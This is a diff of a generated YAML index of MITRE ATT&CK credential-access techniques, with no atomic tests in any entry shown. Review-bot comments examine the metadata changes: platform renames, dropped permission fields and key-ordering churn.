- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43589,12 +44248,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43609,10 +44267,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -43620,14 +44279,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -43670,14 +44329,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -43732,14 +44388,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43790,14 +44445,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -43831,8 +44485,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -43849,11 +44503,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -43871,7 +44524,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -43888,10 +44541,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
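Review bot: The platform rename in `x_mitre_platforms` for T1110.002, `-     - Office 365` / `-     - Azure AD` replaced by `+     - Office Suite` / `+     - Identity Provider`, is a breaking change for anything that filters this index by platform string; any per-platform index derived from this field must be regenerated or it will silently return nothing for this technique under the old names. Worth stating in the PR description that this follows the upstream ATT&CK platform consolidation (the `x_mitre_version` bump from '1.2' to '1.3' is upstream's), so reviewers do not read it as a drop in coverage.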
@@ -43915,46 +44568,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
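Review bot: Nearly all of this hunk is key reordering of the T1555.001 object (`x_mitre_platforms`, `external_references`, `id`, `created`, `x_mitre_version` move from the top of the object to the bottom) with no value change, which buries the only content change, `+     modified: '2024-10-15T16:35:39.985Z'`, in roughly thirty-five churn lines. Have the generator emit keys in a stable order (sorted, or the order the upstream STIX bundle uses) so future syncs produce a reviewable diff.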
@@ -43975,65 +44594,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
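Review bot: For T1555.001 the only reference that actually changes content is "External to DA, the OS X Way" (`+       DA, the OS X Way. Retrieved September 12, 2024.` with the new Slideshare URL), consistent with the same update earlier in this diff under T1555.002; the remaining four references keep their dates and URLs and are only moved. For T1003.004 this hunk deletes `x_mitre_contributors`, `external_references`, `object_marking_refs`, `id`, `type` and `created` and re-adds nothing but `modified`, so every one of those fields must reappear in the following hunks for the object to remain complete; a normalized-key comparison of the before and after objects would make that check mechanical instead of manual. Separately, the unchanged description context shows the registry path on one line and the closing `.` on the next, which indicates the importer drops inline markup around the path and leaves the sentence split; that is pre-existing, but belongs in the converter, not in hand edits to the generated YAML.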
@@ -44042,6 +44658,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44049,31 +44668,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
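Review bot: `-     x_mitre_permissions_required:` / `-     - SYSTEM` is removed from T1003.004 with no replacement, while the description still opens with "Adversaries with SYSTEM access to a host"; if the field was dropped because upstream retired it, any tooling in this repo that filters atomics by required privilege from this index loses that signal and should be checked. The T1606.002 description change in the same hunk, "administrative Azure AD privileges" to "administrative Entra ID privileges", is wording only and lines up with the platform rename elsewhere in the diff.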
@@ -44086,14 +44737,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
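Review bot: Besides the Azure AD to Identity Provider and Office 365 to Office Suite mapping seen earlier, this hunk removes `-     - Google Workspace` from T1606.002 with no one-to-one replacement. If the intent is that Google Workspace now falls under Office Suite, confirm that whatever produces the Google Workspace view of this index maps Office Suite back to it; otherwise the SAML token technique disappears from that view with this sync.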
@@ -44134,14 +44785,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
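Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are deleted at the bottom of T1606.002 here after being inserted higher up in the previous hunk, so this is a move rather than a removal, but together with the `spec_version: '2.1'` deletion it forces the reviewer to cross-check two hunks to confirm no field was lost; a stable key order in the generator would avoid that. The unchanged T1003.007 description context also reads `/proc//maps` and `/proc//mem`, i.e. the placeholder between the slashes has been stripped along with its markup; pre-existing, but worth fixing in the importer since it changes the meaning of the path.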
@@ -44204,81 +44852,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
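Review bot: `-     x_mitre_permissions_required:` / `-     - User` is dropped from T1555.005, the same field removal flagged for T1003.004 above, and should be handled the same way. Stripping the reordering churn, the substantive changes to this object are `modified`, `x_mitre_version: '1.0'` to `'1.1'`, and the new `x_mitre_deprecated: false` / `revoked: false` flags; the description, detection text and all five references are unchanged apart from their position.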
@@ -44363,12 +45009,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44417,38 +45062,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
